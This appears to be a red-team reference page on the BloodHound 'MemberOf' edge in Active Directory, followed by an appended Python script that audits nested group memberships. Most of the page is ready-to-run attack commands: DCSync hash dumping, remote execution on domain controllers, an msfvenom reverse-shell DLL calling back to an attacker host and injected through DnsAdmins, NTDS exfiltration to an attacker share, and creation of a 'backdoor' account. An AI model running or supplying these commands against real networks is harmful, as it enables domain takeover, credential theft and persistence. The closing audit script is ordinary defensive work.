MemberOf

A principal is a member of a group. This edge is structural: it propagates the group's rights to the member.

Applies to: User/Group/Computer → Group


Note

MemberOf is not itself an abuse edge. It means the source object inherits all rights and edges of the target group. The abuse depends on what the group can do.

Common high-value group memberships and their abuse:


Domain Admins / Enterprise Admins

secretsdump (DCSync)

secretsdump.py <domain>/<username>:'<password>'@<dc-ip>
secretsdump.py -hashes :<ntlm-hash> <domain>/<username>@<dc-ip>

wmiexec / psexec to DC

wmiexec.py <domain>/<username>:'<password>'@<dc-ip>
psexec.py <domain>/<username>:'<password>'@<target>

Remote Desktop Users → CanRDP

xfreerdp /u:<username> /p:'<password>' /d:<domain> /v:<target>

Remote Management Users → CanPSRemote

evil-winrm -i <target> -u <username> -p '<password>'

DnsAdmins → DLL injection into DNS service (SYSTEM)

# 1. Build malicious DLL (msfvenom or custom)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-ip> LPORT=4444 -f dll -o evil.dll

# 2. Host DLL on SMB share
smbserver.py share /path/to/dir

# 3. Set DNS server plugin (requires dnscmd or PowerShell)
dnscmd <dc-ip> /config /serverlevelplugindll \\<attacker-ip>\share\evil.dll

# 4. Restart DNS service (requires SeRemoteShutdownPrivilege or sc)
sc \\<dc-ip> stop dns
sc \\<dc-ip> start dns

PowerShell (Windows)

dnscmd <dc-ip> /config /serverlevelplugindll \\<attacker-ip>\share\evil.dll
# Then restart DNS:
sc.exe \\<dc-ip> stop dns; sc.exe \\<dc-ip> start dns

Backup Operators → Registry dump / shadow copy for NTDS

# Backup Operators can read NTDS via shadow copy
wbadmin start backup -backuptarget:\\<attacker-ip>\share -include:c:\windows\ntds
# Or use BackupOperatorToDA tooling

Account Operators → Create/modify users and add to groups (except DA/EA)

New-ADUser -Name "backdoor" -AccountPassword (ConvertTo-SecureString '<password>' -AsPlainText -Force) -Enabled $true
Add-ADGroupMember -Identity "Remote Desktop Users" -Members "backdoor"

Opsec

  • Group membership is resolved when the logon token is created; a change only takes effect after a new logon
  • Nested group membership (Group A MemberOf Group B) also propagates β€” check all ancestor groups in BloodHound
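Added example (not part of the original page): a small audit script that walks nested MemberOf edges over a constructed directory snapshot and reports which of the high-value groups listed above each principal effectively inherits, together with the nesting chain that grants it. The group names are the ones on this page; the principals and edges are assumed sample data, and the script deliberately tolerates a membership cycle.

```python
from collections import deque

# High-value groups named on this page; membership in any of them matters
# because MemberOf propagates the group's rights to the member.
HIGH_VALUE_GROUPS = {
    "Domain Admins", "Enterprise Admins", "Remote Desktop Users",
    "Remote Management Users", "DnsAdmins", "Backup Operators",
    "Account Operators",
}

# Constructed sample snapshot (assumed data, not a real domain):
# principal -> groups it is a direct member of.
MEMBER_OF = {
    "alice": {"Helpdesk"},
    "bob": {"DnsAdmins"},
    "carol": {"Tier2-Ops"},
    "svc-backup": set(),
    "Helpdesk": {"Remote Desktop Users"},
    "Tier2-Ops": {"Server-Admins"},
    "Server-Admins": {"Tier2-Ops", "Backup Operators"},  # nesting cycle
}

def effective_groups(principal, member_of):
    """Return {group: path} for every group reached via nested MemberOf edges;
    path is the chain of groups from the principal to that group."""
    paths = {}
    queue = deque([(principal, [])])
    while queue:
        node, path = queue.popleft()
        for group in member_of.get(node, ()):
            if group in paths:
                continue  # already reached; this also terminates cycles
            paths[group] = path + [group]
            queue.append((group, paths[group]))
    return paths

def high_value_exposure(member_of):
    """Map each leaf principal (never a target of a MemberOf edge) to the
    high-value groups it effectively belongs to and the path granting each."""
    groups = set().union(*member_of.values())
    findings = {}
    for principal in member_of:
        if principal in groups:
            continue
        reached = effective_groups(principal, member_of)
        hits = {g: p for g, p in reached.items() if g in HIGH_VALUE_GROUPS}
        if hits:
            findings[principal] = hits
    return findings
```

Calling high_value_exposure(MEMBER_OF) reports, for example, that carol reaches Backup Operators only through Tier2-Ops and Server-Admins, which is the kind of ancestor chain the Opsec note says to check.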